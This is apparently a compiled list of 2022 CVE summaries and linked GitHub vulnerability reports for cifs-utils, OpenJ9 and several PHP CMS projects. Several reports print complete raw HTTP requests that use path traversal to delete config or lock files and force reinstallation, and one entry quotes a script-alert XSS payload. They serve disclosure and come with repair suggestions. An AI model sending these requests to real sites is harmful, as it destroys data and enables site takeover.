In cifs-utils through 6.14, a stack-based buffer overflow when parsing the mount.cifs ip= command-line argument could lead to local attackers gaining root privileges.

CVE-2022-27239: Linux CIFS Utils and Samba - Free Knowledge Base

A vulnerability, which was classified as problematic, has been found in GetSimple CMS. Affected by this issue is the file /admin/edit.php of the Content Module. The manipulation of the argument post-content with an input like <script>alert(1)</script> leads to cross site scripting. The attack may be launched remotely but requires authentication. Expoit details have been disclosed within the advisory.

CVE-2022-1503

In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles.

Description Peter Shipton ![CLA](https://accounts.eclipse.org/user/eca/badge?mail=Peter_Shipton@ca.ibm.com "Eclipse Contributor Agreement") ![Friend](https://www.eclipse.org/donate/web-api/friends_decorator.php?email=Peter_Shipton@ca.ibm.com "Friend of Eclipse")   2022-04-22 12:34:30 EDT

In Eclipse Openj9 before version 0.32.0, Java 8 & 11 fail to throw the exception captured during bytecode verification when verification is triggered by a MethodHandle invocation, allowing unverified methods to be invoked using MethodHandles.

CVE-2021-41041: 579744 – OpenJ9 allows unverified methods to be invoked using MethodHandles

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\file_controller.php.

Vulnerability file: \\protected\\controller\\backend\\file\_controller.php  
It can be seen that the deleted file or directory is received through the path parameter, and is directly deleted without security filtering, so we can use this vulnerability to delete any file  
![image](https://user-images.githubusercontent.com/90141086/159689762-0e63e61c-7234-4a9e-884c-5f7cd4bf89bb.png)

Vulnerability to reproduce:

1.  First log in to the background to get cookies。
2.  Here I delete the installed.lock file to verify the existence of the vulnerability，construct the packet as follows:

POST /index.php?m=backend&c=file&a=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=file&a=index  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 32

path\[\]=../install/installed.lock

3、Click Send Packet,you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159695536-d0b07eb4-9c48-4bc7-a158-0677406160fc.png)

4、It can be seen that when the installed.lock file exists, when visiting http://x.x.x/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159697683-b812ea24-5a46-4d95-83a0-b239211fb8a9.png)

Therefore, when we delete the installed.lock file and visit http://x.x.x/install again, we will come to the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159696798-eee9f50f-7051-4356-82c1-ef2ddb1621a1.png)

Repair suggestion:

1.  Filter ../ or ..\\ in the file variable
2.  Limit the scope of deleted files or directories

CVE-2022-28058: Arbitrary file deletion vulnerability exists · Issue #20 · Verytops/verydows

Verydows v2.0 was discovered to contain an arbitrary file deletion vulnerability via \backend\database_controller.php.

Vulnerable file: \\protected\\controller\\backend\\database\_controller.php  
It can be clearly seen that $file is not security filtered  
Vulnerable code：  
....................................................  
![image](https://user-images.githubusercontent.com/90141086/159718097-6dbba910-c999-4758-b2ad-3035297b0de5.png)

..................................................

Vulnerability to reproduce:  
1、First log in to the background to get the cookie

2、Here I delete the installed.lock file to verify the existence of the vulnerability, the construction package is as follows:

POST /index.php?m=backend&c=database&a=restore&step=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xiaodi.com/index.php?m=backend&c=database&a=restore  
Cookie: VDSSKEY=d6123bedd1b697a783c9da6f0b92254c  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 42

file%5B%5D=../../../install/installed.lock

3、Click to send the data package, you can see that the file was deleted successfully  
![image](https://user-images.githubusercontent.com/90141086/159714294-7881f591-14d7-4a4a-9ec1-2e7522e9003b.png)

4、It can be seen that when the installed.lock file exists, when visiting http://xxx/install, the page will directly jump to the front home page  
![image](https://user-images.githubusercontent.com/90141086/159714437-d584c580-4580-4ae3-89f7-821da525bc53.png)

So as long as we delete the installed.lock file, we can reinstall the system，When we delete the installed.lock file and visit http://x.x.x/install, we will enter the installation wizard page  
![image](https://user-images.githubusercontent.com/90141086/159715033-a1925083-2b2e-4e85-9374-7990f0612a83.png)

Repair suggestion:

1、Filter ../ or ..\\ in the file variable  
2、Limit the scope of deleted files or directories

CVE-2022-28059: Verydows Exists Arbitrary File Deletion Vulnerability · Issue #21 · Verytops/verydows

ED01-CMS v20180505 was discovered to contain an arbitrary file upload vulnerability via /admin/users.php?source=edit_user&id=1.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28525: There is a file upload vulnerability here:  /admin/users.php?source=edit_user&id=1 · Issue #5 · chilin89117/ED01-CMS

ED01-CMS v20180505 was discovered to contain a SQL injection vulnerability via the component post.php.

CVE-2022-28524: There is a SQL injection vulnerability here: /post.php · Issue #4 · chilin89117/ED01-CMS

HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete.

Vulnerability file: \\admin\\controllers\\template.php  
The vulnerability code is as follows:  
![image](https://user-images.githubusercontent.com/90141086/161013598-2b6334d7-6b8b-4382-b01d-e3bf9c87d79d.png)

Arbitrary file deletion vulnerability could lead to system reinstallation  
Vulnerability to reproduce:  
1、First log in to the background to get cookies

2、Part of the code in the /install/index.php file is as follows:  
the following code means that the system can be reinstalled as long as the /config/config.php file is deleted  
..................................................................  
![image](https://user-images.githubusercontent.com/90141086/161021721-bdbbd26f-19fc-4dcf-a58a-929aed9c0369.png)

..................................................................

3、Construct the packet that deletes the config.php file as follows:  
.......................................................................................................  
POST /admin/index.php/template/ajax?action=delete HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: application/json, text/javascript, _/_; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://www.xxx.com/admin/index.php/template?dir=Default/  
Content-Length: 30  
Cookie: w4Gy9uu6fQW3admin=60edcf231451d2f7493eb8dcfc46d32e  
DNT: 1  
Connection: close

dir=Default%2F&file=../../../config/config.php  
........................................................................................................

Repair suggestion:  
1、Filter ../ or ..\\ in file variables  
2、Only allow files in the specified directory to be deleted

CVE-2022-28523: There is an arbitrary file deletion vulnerability here: /admin/index.php/template/ajax?action=delete · Issue #17 · Neeke/HongCMS

GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=.

Vulnerability file: \\Application\\Common\\Util\\File.class.php  
![image](https://user-images.githubusercontent.com/90141086/161521942-4a2e8198-04a3-4814-9657-e227e07773fd.png)

Vulnerability to reproduce:  
1、First log in to the background  
2、Visit url: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin  
3、Here delete the 111 folder in the root directory，construct the packet as follows:  
.................................................  
GET /index.php?m=admin&c=custom&a=plugindelhandle&plugin\_name=../111 HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://www.xxx.com/index.php?m=admin&c=custom&a=plugin  
Cookie: PHPSESSID=jlmibkatfp939ds8pk3qpiv536; Hm\_lvt\_48659a4ab85f1bcebb11d3dd3ecb6760=1649066135; Hm\_lpvt\_48659a4ab85f1bcebb11d3dd3ecb6760=1649066212; greencms\_last\_visit\_page=aHR0cDovL3d3dy54aWFvZGkuY29tL2luZGV4LnBocD9tPWFkbWluJmM9Y3VzdG9tJmE9cGx1Z2lu  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
.................................................

Repair suggestion:  
1、Filter ../ and ..\\  
2、Specify the range of files to delete

CVE-2022-28918: There is an arbitrary file deletion vulnerability here: /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name= · Issue #116 · GreenCMS/GreenCMS

dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del.

Vulnerability file: \\framework\\ext\\Util.php  
You can see that the following code does not filter ../ or ..\\, it just filters . or .., which will cause any folder to be deleted  
![image](https://user-images.githubusercontent.com/90141086/161227651-3b70d3c6-c3a3-4195-88dd-cdb483c5ef63.png)

Vulnerability to reproduce:  
1、Log in to the backend first  
2、Construct the packet as follows:  
.............................................  
POST /admin.php?r=admin/AdminBackup/del HTTP/1.1  
Host: www.xxx.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: application/json, text/javascript, _/_; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer: http://www.xxx.com/admin.php?r=admin/AdminBackup/index  
Content-Length: 20  
Cookie: PHPSESSID=prukpjkatj61ivpcp5lh976ok4  
DNT: 1  
Connection: close

data=../111  
............................................  
You can see that the page shows that the file was deleted successfully  
![86Y4W@)_U2F 17DXTD5H2R](https://user-images.githubusercontent.com/90141086/161229545-d046cd5a-c4f9-49b4-8016-9ee9339786c0.png)

Repair suggestion:  
filter ../ or ..\\

Tag

#php